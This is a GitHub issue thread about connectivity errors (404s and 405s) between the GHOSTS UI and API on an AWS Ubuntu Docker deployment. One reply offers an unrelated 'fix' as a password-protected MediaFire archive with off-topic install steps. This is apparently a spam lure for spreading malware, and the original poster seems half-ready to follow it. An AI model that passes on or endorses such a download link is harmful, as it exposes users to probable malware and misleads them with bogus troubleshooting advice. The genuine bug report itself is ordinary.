### ISSUE TITLE
ghost-UI to ghost-API Connectivity

### ISSUE THREAD

**Issue by bouatom** [cmu-sei/GHOSTS#403]
Hello,
Running the latest version of Ghosts and trying to run Timelines and create users and I'm seeing some errors. 

![image](https://github.com/user-attachments/assets/fa1fc6ac-ea71-4a63-907a-44f9adbedcf6)

The timeline is basic but getting 404 errors

When manually creating NPCS, I'm seeing 405 errors

![image](https://github.com/user-attachments/assets/9ba27005-b5b8-4aae-8d34-01706754836e)

This is built within AWS and the security groups are open for all the ports needed. Seems like there is something not connecting right within the API server. The server is running Ubuntu 22 with docker.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by bouatom** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

Not sure where to put these files. Everything is running on docker within Ubuntu
